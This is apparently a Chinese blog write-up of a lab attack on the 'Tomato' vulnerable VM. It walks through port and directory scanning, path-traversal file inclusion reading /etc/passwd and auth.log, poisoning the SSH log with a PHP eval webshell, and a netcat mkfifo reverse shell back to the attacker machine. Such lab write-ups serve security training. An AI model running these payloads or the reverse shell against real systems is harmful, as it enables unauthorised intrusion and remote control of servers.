Tomato靶机~文件包含日志

寻找网站上传点并把 php 恶意代码文件改成 jpg 上传到网站上在本地包含引入恶意代码,当文件被引入后代码就被执行;

0x01信息收集

markdown 复制代码
# 环境准备:
Target IP:192.168.66.143
Attack IP:192.168.66.84
靶机目标:Tomato
// 这里需要注意靶机本身环境是桥接模式,我们需要给它换成NAT模式
markdown 复制代码
# 扫描网段
arp-sacn -l
markdown 复制代码
# 对靶机192.168.66.143端口扫描
nmap 192.168.66.143
markdown 复制代码
# 目录扫描
dirsearch -u "http://192.168.66.143"
dirb "http://192.168.66.143"

0x02漏洞发现

发现有文件上传的漏洞

markdown 复制代码
# 由于是linux系统,我们尝试看一下passwd文件
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd
markdown 复制代码
# 我们再看一下它的日志
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

0x03反弹shell

markdown 复制代码
# 我们尝试写一句话木马 ,进行反弹
ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.66.143
markdown 复制代码
# 使用中国蚁剑连接
markdown 复制代码
# 连接终端
markdown 复制代码
# 在kali上开个监听
nc -lvvp 9999 
markdown 复制代码
# 反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 9999 >/tmp/f
// IP是攻击机的

好小子,离成功又近一步!!!

相关推荐
吉吉6131 分钟前
文件包含之伪协议漏洞复现
web安全·网络安全
Bruce_Liuxiaowei43 分钟前
解决 PowerShell 模块加载无响应问题的实用指南——Invoke-Obfuscation为例
windows·网络安全·内网渗透
tangyal12 小时前
渗透笔记1
笔记·网络安全·渗透
吗喽15434518817 小时前
渗透高级第一次作业(笔记整理)
笔记·安全·网络安全
皓月盈江1 天前
个人计算机Linux Debian桌面操作系统上网安全防护措施
linux·ubuntu·网络安全·debian·桌面操作系统·上网安全防护措施
QuantumRedGuestk1 天前
烂土豆提权技术详解ms16-075
网络安全·烂土豆提权·windows技术
Bruce_Liuxiaowei1 天前
基于Regsvr32.exe的渗透测试完整记录
网络·windows·安全·网络安全·内网渗透
内心如初1 天前
05_等保系列之安全工作规划
网络安全·等保测评·等保测评从0-1·等保测评笔记
肥硕之虎1 天前
从原理到实操:php://filter 伪协议玩转文件包含漏洞
开发语言·网络安全·php
诶. .1 天前
前四天总结
网络安全